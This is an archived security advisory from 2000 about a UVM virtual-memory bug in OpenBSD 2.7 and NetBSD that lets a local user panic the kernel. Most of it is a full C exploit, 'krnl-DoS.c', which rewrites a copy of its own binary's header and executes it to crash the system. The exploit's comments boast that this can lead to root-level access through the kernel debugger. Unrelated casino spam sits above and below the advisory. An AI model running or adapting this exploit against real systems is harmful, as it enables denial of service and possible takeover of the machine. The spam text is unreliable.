Casinos Not On Gamstop Non Gamstop Casinos Casinos Not On Gamstop Online Casinos UK Non Gamstop Casino
5th Nov 2000 [SBWID-139]
COMMAND
	    kernel
SYSTEMS AFFECTED
	    OpenBSD 2.7, NetBSD
PROBLEM
	    Anonymous source  found following.   UVM is  a new  virtual memory
	    system developed which  is currently used  in the OpenBSD.   It is
	    significantly better than the traditional MACH based VM.
	    The bug exists  in the anonymous  mapping code in  UVM.  This  bug
	    allows for  any local  user (or  remote user)  to crash the entire
	    OpenBSD system, rendering it completely useless.  Once the  system
	    has crashed,  a local  user (with  access to  the terminal) may in
	    fact hack the system.   The system drops into  DDB (man it).   DDB
	    allows for debugging of the actual kernel.
	    Basically,  if  the  (sz  &  (PAGE_SIZE-1))  is  true,  the kernel
	    panic()'s.  Here is the xploit:
	
	    // PUBLIC RELEASE
	    //
	    // krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG
	    //
	    // This exploit is proof of concept code. It exploits the UVM bug in
	    // all OpenBSD kernels. It can also be used to gain god access via
	    // ddb during the crash recovery phase of OpenBSD's security structure.
	    //
	    // Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP,
	    //         Condemnation, caddis[TESO], Solar Designer, gov-boi,
	    //         #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting)
	    //	   SSG, www.subterrain.net
	    //
	    // PS: The exploit is broke very slightly, so this takes some knowledge
	    //
	    // PUBLIC RELEASE
	    #include <stdio.h>
	    #include <errno.h>
	    #include <stdlib.h>
	    #include <string.h>
	    #include <unistd.h>
	    #include <a.out.h>
	    #include <fcntl.h>
	    #include <sys/types.h>
	    #define CRASH_FILE "./f0rKb0mB"
	    extern int      errno;
	    int
	    main(int argc, char *argv[])
	    {
	    struct exec    *ehdr;
	    struct stat     statbuf;
	    int             fd;
	    unsigned char  *data;
	       fd = open(argv[0], O_RDONLY);
	       if (fd < 0)
	       {
	    perror("main() : open(argv[0]) ");
	    exit(-1);
	       }
	       if (fstat(fd, &statbuf) < 0)
	       {
	    perror("main() : fstat() ");
	    exit(-1);
	       }
	       data = (unsigned char *) malloc(statbuf.st_size);
	       if (data == NULL)
	       {
	    perror("main() : malloc() ");
	    exit(-1);
	       }
	       if (read(fd, data, statbuf.st_size) <= 0)
	       {
	    puts("main() : read() Failure");
	    exit(-1);
	       }
	       ehdr = (struct exec *) data;
	       close(fd);
	       unlink(CRASH_FILE);
	       fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR);
	       if (fd < 0)
	       {
	    perror("main() : open(CRASH_FILE) ");
	    exit(-1);
	       }
	       ehdr->a_data += 3;
	       if (write(fd, data, statbuf.st_size) < 0)
	       {
	    perror("main() : write() ");
	    exit(-1);
	       }
	       close(fd);
	       if (execlp(CRASH_FILE, NULL) < 0)
	       {
	    perror("main() : execlp() ");
	    exit(-1);
	       }
	       return (0);
	    }
	
SOLUTION
	    There is a patch.
Internet highlights

Casino Not On Gamstop